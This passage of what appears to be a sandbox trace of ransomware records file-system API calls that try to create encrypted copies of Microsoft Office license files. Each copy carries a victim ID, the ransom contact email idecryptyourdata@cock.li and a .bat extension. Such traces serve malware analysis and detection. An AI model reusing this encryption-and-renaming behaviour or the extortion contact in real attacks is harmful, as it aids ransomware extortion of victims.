lpNewFilePointer=0x0) returned 1 [0164.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.227] CloseHandle (hObject=0x51c) returned 1 [0164.228] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.228] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.229] CloseHandle (hObject=0x51c) returned 1 [0164.229] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.230] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.230] CloseHandle (hObject=0x51c) returned 1 [0164.231] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.231] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.231] CloseHandle (hObject=0x51c) returned 1 [0164.232] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.232] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.232] CloseHandle (hObject=0x51c) returned 1 [0164.235] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.236] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.236] CloseHandle (hObject=0x51c) returned 1 [0164.237] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.237] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.237] CloseHandle (hObject=0x51c) returned 1 [0164.238] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.238] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.238] CloseHandle (hObject=0x51c) returned 1 [0164.239] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.239] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.239] CloseHandle (hObject=0x51c) returned 1 [0164.242] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.242] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_Subscription-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subscription-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.243] CloseHandle (hObject=0x51c) returned 1 [0164.250] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.251] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_Subscription-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subscription-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.251] CloseHandle (hObject=0x51c) returned 1 [0164.255] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.255] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_Subscription-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subscription-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.256] CloseHandle (hObject=0x51c) returned 1 [0164.256] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.256] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTest-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtest-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.283] CloseHandle (hObject=0x51c) returned 1 [0164.284] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.284] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTest-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtest-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.285] CloseHandle (hObject=0x51c) returned 1 [0164.286] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.286] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTest-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtest-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.286] CloseHandle (hObject=0x51c) returned 1 [0164.287] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.287] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTrial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtrial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.287] CloseHandle (hObject=0x51c) returned 1 [0164.663] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.663] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.664] CloseHandle (hObject=0x50c) returned 1 [0164.665] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.665] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.665] CloseHandle (hObject=0x50c) returned 1 [0164.666] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.666] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.666] CloseHandle (hObject=0x50c) returned 1 [0164.667] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.667] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.668] CloseHandle (hObject=0x50c) returned 1 [0164.668] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.668] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.669] CloseHandle (hObject=0x50c) returned 1 [0164.669] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.670] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.670] CloseHandle (hObject=0x50c) returned 1 [0164.670] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.671] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.671] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.671] CloseHandle (hObject=0x50c) returned 1 [0164.671] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.671] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.671] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.672] CloseHandle (hObject=0x50c) returned 1 [0164.672] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.672] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.672] CloseHandle (hObject=0x50c) returned 1 [0164.673] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.673] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.674] CloseHandle (hObject=0x50c) returned 1 [0164.674] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.674] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.675] CloseHandle (hObject=0x50c) returned 1 [0164.676] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.676] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.676] CloseHandle (hObject=0x50c) returned 1 [0164.677] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.677] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.677] CloseHandle (hObject=0x50c) returned 1 [0164.678] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.678] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.679] CloseHandle (hObject=0x50c) returned 1 [0164.679] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.680] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.680] CloseHandle (hObject=0x50c) returned 1 [0164.680] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.680] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 